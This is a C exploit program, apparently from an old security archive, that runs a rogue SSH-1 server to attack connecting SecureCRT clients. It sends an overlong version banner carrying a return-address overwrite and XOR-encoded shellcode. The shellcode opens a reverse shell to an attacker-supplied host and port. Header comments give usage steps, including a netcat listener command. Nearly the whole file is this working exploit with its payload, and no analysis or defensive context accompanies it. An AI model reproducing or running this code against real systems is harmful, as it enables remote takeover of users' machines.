home *** CD-ROM | disk | FTP | other *** search
- // The bug was discovered by Kyuzo
- // The schell code exploit was coded by Andrea Lisci
- // The program working in the following way
- //
- // run the exploit
- //./shellcode <netcat_machine> <netcat_port>
- // run the netcat
- // nc -l -p <netcat_port>
- // connect from secureCRT to the port 9988 using ssh version 1
- //
- // the remote shell will be opened at netcat computer
-
-
-
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
-
- #define PORT 9988
-
- int main(int argc, char **argv) {
- int s, n, i, sz = sizeof(struct sockaddr_in);
- struct sockaddr_in local, whatever;
- char payload[2510], *pshell;
-
- unsigned char preshell[]="\xb8\x00\x03\xff\xe0";
-
-
- unsigned short int a_port;
- unsigned long a_host;
- struct hostent *ht;
- struct sockaddr_in sin;
-
- unsigned char shell[] =
- "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
- "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
- "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
- "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
- "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
- "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
- "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
- "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
- "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
- "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
- "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
- "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
- "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
- "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
- "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
- "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
- "\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
- "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
- "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
- "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
- "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
- "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
- "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
- "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
- "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
- "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
- "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
- "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
- "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
- "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
- "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
- "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
- "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
- "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
- "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
- "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
- "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
- "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
- "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
- "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
- "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
- "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
- "\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
- "\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";
-
-
- a_port=htons(atoi(argv[2]));
- a_port ^= 0x9595;
- //ht=gethostbyname(argv[1]);
- //a_host= (unsigned long) *(ht->h_addr);
- a_host=inet_addr(argv[1]);
- a_host ^= 0x95959595;
-
- shell[385]= ((a_port) & 0xff);
- shell[386]= ((a_port >> 8 ) & 0xff);
- shell[390]= ((a_host) & 0xff);
- shell[391]= ((a_host >> 8) & 0xff);
- shell[392]= ((a_host >>16) & 0xff);
- shell[393]= ((a_host >>24) & 0xff);
-
- memset(payload,0x90,sizeof(payload));
-
-
-
- strcpy(payload, "SSH-1.1-");
- for (i = 8; i < 267; i++)
- payload[i] = 'A';
- payload[i+1]=0x00;
- payload[i+2]=0xbb;
- payload[i+3]=0x12;
- payload[i+4]=0x00;
- payload[i+5] = '\n';
- payload[i+6]= '\0';
-
- pshell=&payload;
- pshell+=100;
- memcpy(pshell,preshell,sizeof(preshell));
-
- pshell=&payload;
- pshell+=300;
- memcpy(pshell,shell,sizeof(shell));
-
-
- if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- perror("socket");
- return 1;
- }
- local.sin_family = AF_INET;
- local.sin_port = htons(PORT);
- local.sin_addr.s_addr = INADDR_ANY;
- memset(&(local.sin_zero), 0, 8);
- if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
- perror("bind");
- return 1;
- }
- if (listen(s, 2) == -1) {
- perror("listen");
- return 1;
- }
- printf("waiting for connection...\n");
- if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
- perror("accept");
- return 1;
- }
- printf("client connected\n");
- if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
- perror("send");
- return 1;
- }
- printf("sent string: [%s]\n", payload);
- close(n);
- close(s);
- return 0;
- }
-
-